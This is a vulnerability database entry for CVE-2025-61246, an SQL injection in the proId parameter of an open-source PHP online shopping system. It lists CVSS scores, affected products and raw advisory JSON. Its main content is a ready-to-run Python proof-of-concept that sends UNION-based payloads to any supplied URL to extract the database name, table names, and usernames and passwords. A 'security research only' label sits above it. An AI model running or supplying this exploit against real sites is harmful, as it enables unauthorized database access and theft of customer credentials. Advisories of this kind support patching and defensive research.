Security Vulnerability Report
中文
CVE-2025-61246 CVSS 9.8 CRITICAL

CVE-2025-61246

Published: 2026-01-08 17:15:48
Last Modified: 2026-01-16 21:31:25

Description

indieka900 online-shopping-system-php 1.0 is vulnerable to SQL Injection in master/review_action.php via the proId parameter.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:indieka900:online_shopping_system:1.0:*:*:*:*:*:*:* - VULNERABLE
indieka900 online-shopping-system-php 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-61246 SQL Injection PoC # Target: indieka900 online-shopping-system-php 1.0 # Vulnerability: SQL Injection in master/review_action.php via proId parameter def exploit_sql_injection(target_url): """ SQL Injection PoC for CVE-2025-61246 Extract database name and user information """ # Vulnerable endpoint vuln_url = f"{target_url}/master/review_action.php" # Payload to extract database name # Using UNION-based SQL injection payload_dbname = "proId=1 UNION SELECT database(),user(),version(),4,5,6,7-- -" # Payload to extract table names payload_tables = "proId=1 UNION SELECT table_name,2,3,4,5,6,7 FROM information_schema.tables WHERE table_schema=database()-- -" # Payload to extract user credentials payload_users = "proId=1 UNION SELECT username,password,3,4,5,6,7 FROM users-- -" print(f"[*] Target: {target_url}") print(f"[*] Vulnerability: SQL Injection in proId parameter") print(f"[*] Exploiting...") try: # Extract database information response = requests.get(f"{vuln_url}?{payload_dbname}", timeout=10) if response.status_code == 200: print(f"[+] Database Info Extracted Successfully") print(f"[*] Response snippet: {response.text[:500]}") # Extract tables response = requests.get(f"{vuln_url}?{payload_tables}", timeout=10) if response.status_code == 200: print(f"[+] Tables Extracted Successfully") # Extract users response = requests.get(f"{vuln_url}?{payload_users}", timeout=10) if response.status_code == 200: print(f"[+] User Credentials Extracted Successfully") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com/shop") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_sql_injection(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61246", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:48.400", "lastModified": "2026-01-16T21:31:24.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "indieka900 online-shopping-system-php 1.0 is vulnerable to SQL Injection in master/review_action.php via the proId parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:indieka900:online_shopping_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E708379C-A4B0-4264-B665-14A76C93B8BF"}]}]}], "references": [{"url": "https://github.com/hackergovind/CVE-2025-61246", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/hackergovind/CVE-2025-61246", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}